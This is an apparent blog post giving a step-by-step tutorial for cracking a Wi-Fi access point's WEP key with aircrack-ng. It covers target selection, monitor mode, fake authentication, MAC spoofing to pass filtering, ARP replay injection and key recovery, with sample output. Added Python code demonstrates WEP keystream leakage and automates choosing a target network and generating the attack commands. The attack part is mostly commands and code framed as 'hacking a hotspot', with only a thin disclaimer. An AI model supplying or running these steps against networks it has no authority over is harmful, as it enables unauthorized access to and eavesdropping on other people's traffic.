
Thursday, 18 February 2016

Cracking WEP with the aircrack-ng suite (hacking a Wi-Fi hotspot)

Prerequisites:
- Linux command-line experience
- BackTrack 4 R2, or Ubuntu 7.10 with patched Wi-Fi drivers and the aircrack-ng suite
- common sense
The information in this tutorial is for educational and informational purposes only; use it at your own risk. Soldierx.com, its members, crew and affiliates cannot be held responsible for the misuse of this information.
WEP has been called the least secure method of protecting a wireless access point in the history of Wi-Fi. The main reason is the way it uses RC4: every frame is encrypted with a keystream generated from a 24-bit initialization vector (IV) prepended to the shared key, and that IV is sent in the clear in front of the frame. With only about 16.7 million possible IVs, keystreams get reused, and because every frame starts with a predictable header, each captured frame hands an eavesdropper keystream bytes for its IV. A fraction of those IVs are "weak" and leak bytes of the key, so a statistical analysis of enough captured frames recovers the whole key. (The ICV, a CRC-32 checksum WEP appends to each frame, is a separate weakness and is not what this attack relies on.) The number of captured IVs required varies: the older FMS/KoreK attacks needed on the order of 200 to 500 thousand for a 64-bit key and more for a 128-bit key, while the PTW attack used by aircrack-ng 0.9 and later usually succeeds with a few tens of thousands.
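To make the weakness concrete, here is an added illustration (not code from the tutorial or from the aircrack-ng project) of what an eavesdropper gets from WEP frames: RC4 keyed by IV || shared key, the IV in the clear, and a known 8-byte LLC/SNAP header at the start of every payload, so each frame yields the first keystream bytes for its IV, and any IV seen twice decrypts the start of the other frame. Those (IV, keystream) pairs are exactly what the ARP replay step later in the tutorial produces in bulk and what aircrack-ng's statistics run on. The shared key, the IVs, the ARP payload and the IP frame below are constructed for the example, and the CRC-32 ICV is left out.

```python
"""Why WEP leaks keystream: RC4 keyed by IV || key, with the IV sent in the clear.

Added illustration, not code from the tutorial or from the aircrack-ng project.
The shared key, IVs and frame payloads are constructed for the example, and the
CRC-32 ICV that WEP appends to each frame is left out.
"""
IV_BITS = 24
IV_SPACE = 1 << IV_BITS        # 16,777,216 possible keystreams per shared key

# LLC/SNAP header at the start of every WEP data payload; only the EtherType
# varies, so an eavesdropper knows these 8 plaintext bytes of every frame.
SNAP_ARP = bytes.fromhex("aaaa030000000806")   # EtherType 0x0806: ARP
SNAP_IP = bytes.fromhex("aaaa030000000800")    # EtherType 0x0800: IPv4


def rc4(key, length):
    """RC4 keystream: key scheduling (KSA), then `length` bytes of PRGA output."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(shared_key, iv, payload):
    """Return iv || (payload XOR RC4(iv || shared_key)), which is what WEP puts on the air."""
    if len(iv) != 3 or len(shared_key) not in (5, 13):
        raise ValueError("IV is 3 bytes; WEP keys are 40-bit (5 bytes) or 104-bit (13 bytes)")
    keystream = rc4(iv + shared_key, len(payload))
    return iv + bytes(p ^ k for p, k in zip(payload, keystream))


def known_keystream(frame, known_prefix):
    """Eavesdropper's view of one frame: the IV is the clear-text prefix, and XORing
    the ciphertext against the bytes every such frame starts with gives keystream."""
    iv, body = frame[:3], frame[3:]
    return iv, bytes(c ^ p for c, p in zip(body, known_prefix))


def build_iv_table(arp_frames):
    """Collect IV -> first keystream bytes from captured ARP frames. These
    (IV, keystream) pairs are the raw material aircrack-ng's statistical key
    recovery works on; the ARP-replay step exists to produce them quickly."""
    table = {}
    for frame in arp_frames:
        iv, ks = known_keystream(frame, SNAP_ARP)
        table[iv] = ks
    return table


def decrypt_prefix(frame, table):
    """Any other frame sent under an IV already in the table is readable for as
    many bytes as we hold keystream, regardless of what it carries."""
    iv, body = frame[:3], frame[3:]
    ks = table.get(iv)
    if ks is None:
        return None
    return bytes(c ^ k for c, k in zip(body, ks))


def demo():
    """Three ARP frames (one IV reused), then an IP frame under an IV already seen."""
    key = bytes.fromhex("1234567890")              # constructed 40-bit key
    arp_body = (bytes.fromhex("0001080006040001")  # constructed Ethernet/IPv4 ARP request
                + bytes.fromhex("000fb588ac82") + bytes([192, 168, 1, 10])
                + bytes(6) + bytes([192, 168, 1, 1]))
    ivs = [b"\x00\x00\x01", b"\x00\x00\x02", b"\x00\x00\x01"]   # third reuses the first
    arp_frames = [wep_encrypt(key, iv, SNAP_ARP + arp_body) for iv in ivs]
    table = build_iv_table(arp_frames)
    ip_frame = wep_encrypt(key, b"\x00\x00\x02", SNAP_IP + bytes.fromhex("4500"))
    return len(table), decrypt_prefix(ip_frame, table)


if __name__ == "__main__":
    n_ivs, leaked = demo()
    print(f"{n_ivs} distinct IVs seen of {IV_SPACE}; leaked IP frame prefix: {leaked.hex()}")
```

The point of the table is scale: a real capture holds tens of thousands of such entries, still a tiny fraction of the 2^24 IV space, and the key falls to statistics on them rather than to any brute force of the key itself.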
***NOTE***
** This tutorial covers a basic WEP crack.
** It is by no means exhaustive and is meant as a jumping-off point; from here I send you to Google, the place where I first got my information.
**********
*** ALL COMMANDS LISTED IN THIS TUTORIAL ARE RUN FROM THE root ACCOUNT ON THE MACHINE. IF YOU ARE NOT RUNNING BACKTRACK, OR YOU BUILT YOUR OWN SYSTEM, LOG IN AS root OR PREFIX EACH COMMAND WITH sudo. ***
The first step in any cracker's attempt at a Wi-Fi access point is to pick a target. Start by running airmon-ng with no arguments to list the available wireless adapters with their chipsets and drivers:

Interface   Chipset    Driver
wifi0       Atheros    madwifi-ng
ath0        Atheros    madwifi-ng VAP (parent: wifi0) (VAP destroyed)
Then put the adapter into monitor mode with airmon-ng start <adapter name> (ath0, wlan0, wlan1, etc.). Monitor mode makes the card pass up every 802.11 frame it hears on the channel, not just frames addressed to it (the wireless counterpart of promiscuous mode), which is how it grabs ARP packets, IVs and such out of the air; with a supported, patched driver it also allows packet injection, shooting frames at the network to get a response from the access point. airmon-ng prints the name of the monitor-mode interface it created, typically mon0 (on the madwifi-ng card in this example it is ath0). The next command to run is airodump-ng <monitor interface>, which lists all access points in range and lets you choose one. Pick the one with the strongest signal, which you read from the PWR column while the program runs. On most drivers PWR is a negative number in dBm (decibels relative to one milliwatt), so -56 is a stronger signal than -86: the closer the number is to zero, the more power is being received. Some drivers, including the madwifi driver in the output below, report a positive level instead, where larger is stronger.
 CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy

 BSSID              STATION            PWR  Lost  Packets  Probes

 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782
Once you have selected your target, make note of the BSSID, the channel and the amount of data it receives. Another good indicator of a worthwhile access point is a reasonable data rate in the #/s column (80-120 without injection; with injection it can be much more), since data only flows when a client is actually using the network. Then restart airodump-ng locked to that channel and BSSID and writing to a capture file:

airodump-ng -w <file prefix> --channel <channel of target> --bssid <BSSID or MAC address of target> <interface to capture on: whatever airmon-ng gave you as the monitor-mode interface, typically mon0>

Example:
airodump-ng -w output --channel 9 --bssid 00:14:6C:7E:40:80 ath0

airodump-ng numbers its output files, so -w output writes output-01.cap (and output-01.csv, the same network list in a parseable form); that .cap file is what aircrack-ng will read.
At this stage open a second tab in your console window and run

aireplay-ng -1 0 -a <BSSID of target> <interface>

This is a fake authentication attack: it associates your card with the access point so the AP will accept the frames you inject later. Many drivers also need the network name and your own card's MAC address, as in aireplay-ng -1 0 -e <ESSID> -a <BSSID of target> -h <MAC of your wireless card> <interface>; if the access point filters by MAC, the address you give with -h (and set on your card with macchanger) must be one of a client it already accepts. The attack will give you something like this:

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful
Once the association succeeds, run the injection to gather data. Keep airodump-ng running alongside it, because airodump-ng is what writes the captured packets to the .cap file you will feed to aircrack-ng. Start the attack with

aireplay-ng -3 -b <BSSID of target> <interface>

This is the ARP request replay attack: aireplay-ng waits for an ARP request on the network and then retransmits it over and over. Each time the access point rebroadcasts the frame it encrypts it with a fresh IV, so this produces the stream of IVs you need far faster than waiting for normal traffic. It needs a client on the network to send the first ARP request, which is why an access point with real data flowing was chosen above.

Example:
aireplay-ng -3 -b 00:14:6C:7E:40:80 ath0

You should see this:

Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
Open a third console window and enter aircrack-ng <prefix>-01.cap (for the airodump-ng command above, aircrack-ng output-01.cap). aircrack-ng attempts a crack with what you have captured so far; if it does not succeed it keeps watching the file as data comes in and retries at regular intervals. If the capture contains more than one network, add -b <BSSID of target> so it works on the right one. Once the crack has succeeded you will see a screen like this:

                                Aircrack-ng 0.9

                  [00:03:06] Tested 674449 keys (got 96610 IVs)

   KB    depth   byte(vote)
    0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0)
    1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12)
    2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10)
    3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15)

                       KEY FOUND! [ 12:34:56:78:90 ]
                            Probability: 100%

This screen tells you that you have successfully cracked the key; copy it down to use or test. You can back up the .cap files to a flash drive and re-run the crack later if you lose the key, although if the access point's key changes you will have to capture and crack it again.
That is all you really need to know to crack a WEP-encrypted access point. Note that no choice of WEP key helps against this: the weakness is in the protocol, not in the key, so the only real remedy is to move the access point to WPA2.
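To make the target-selection step concrete, here is an added example (not part of the original tutorial, and not aircrack-ng's own code) that parses the CSV file airodump-ng -w writes next to its .cap, ranks the WEP networks the way the text describes (strongest PWR first, then the most captured IVs), checks that a client is actually talking to the winner, and fills in the tutorial's command sequence for it. The CSV text, the second and third networks, and the MAC passed as your own card are constructed for the example around the tutorial's "teddy" access point.

```python
"""Pick a WEP target from airodump-ng's CSV output and print the follow-on commands.

Added example, not from the tutorial or from aircrack-ng. airodump-ng -w <prefix>
writes <prefix>-01.csv beside <prefix>-01.cap: an access-point table, a blank
line, then a station table. SAMPLE_CSV below is constructed for this example.
"""
import csv
import io
import shlex

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:14:6C:7E:40:80, 2007-03-21 19:17:05, 2007-03-21 19:25:05,  9,  54, WEP , WEP , , -42,     5240,   178307,   0.  0.  0.  0,   5, teddy, 
00:0C:41:AA:BB:CC, 2007-03-21 19:17:09, 2007-03-21 19:25:01,  6,  54, WEP , WEP , , -81,     1207,      112,   0.  0.  0.  0,   7, weakone, 
00:1A:70:11:22:33, 2007-03-21 19:17:11, 2007-03-21 19:25:03, 11,  54, WPA2, CCMP, PSK, -40,     4801,        0,   0.  0.  0.  0,   6, office, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:0F:B5:88:AC:82, 2007-03-21 19:17:05, 2007-03-21 19:25:05, -42,   183782, 00:14:6C:7E:40:80, teddy
"""


def parse_airodump_csv(text):
    """Return (access_points, stations) as lists of dicts with the fields we rank on."""
    aps, stations = [], []
    section = None
    for row in csv.reader(io.StringIO(text)):
        fields = [f.strip() for f in row]
        if not fields or not fields[0]:
            continue                      # blank separator line
        if fields[0] == "BSSID":
            section = "ap"
            continue
        if fields[0] == "Station MAC":
            section = "station"
            continue
        if section == "ap" and len(fields) >= 14:
            aps.append({
                "bssid": fields[0], "channel": int(fields[3]), "privacy": fields[5],
                "cipher": fields[6], "power": int(fields[8]), "beacons": int(fields[9]),
                "ivs": int(fields[10]), "essid": fields[13],
            })
        elif section == "station" and len(fields) >= 6:
            stations.append({"mac": fields[0], "power": int(fields[3]),
                             "packets": int(fields[4]), "bssid": fields[5]})
    return aps, stations


def pick_wep_target(aps, min_ivs=0):
    """Strongest-signal WEP network, ties broken by IVs already captured.
    PWR is negative dBm on most drivers (-42 beats -86) and an unsigned level on a
    few older ones (60 beats 42); max() is right for either as long as a capture
    uses one scale throughout."""
    wep = [ap for ap in aps if ap["privacy"].startswith("WEP") and ap["ivs"] >= min_ivs]
    if not wep:
        return None
    return max(wep, key=lambda ap: (ap["power"], ap["ivs"]))


def associated_station(target, stations):
    """Busiest client of the target, if any: without one there are no ARP requests to replay."""
    clients = [s for s in stations if s["bssid"] == target["bssid"]]
    return max(clients, key=lambda s: s["packets"]) if clients else None


def attack_commands(target, iface, own_mac, prefix="output"):
    """The tutorial's command sequence with the target's details filled in."""
    bssid, channel = target["bssid"], target["channel"]
    essid = shlex.quote(target["essid"])
    return [
        f"airodump-ng -w {prefix} --channel {channel} --bssid {bssid} {iface}",
        f"aireplay-ng -1 0 -e {essid} -a {bssid} -h {own_mac} {iface}",
        f"aireplay-ng -3 -b {bssid} -h {own_mac} {iface}",
        f"aircrack-ng -b {bssid} {prefix}-01.cap",
    ]


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    target = pick_wep_target(aps)
    client = associated_station(target, stations)
    print(f"target: {target['essid']} {target['bssid']} ch {target['channel']} "
          f"PWR {target['power']} IVs {target['ivs']} client: {client and client['mac']}")
    for cmd in attack_commands(target, "ath0", "00:11:22:33:44:55"):   # constructed own MAC
        print(cmd)
```

Each command is meant for its own console tab, exactly as the tutorial lays them out; the monitor interface name and your card's MAC are the two things you must supply from your own airmon-ng and ifconfig output.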

zealmatblog
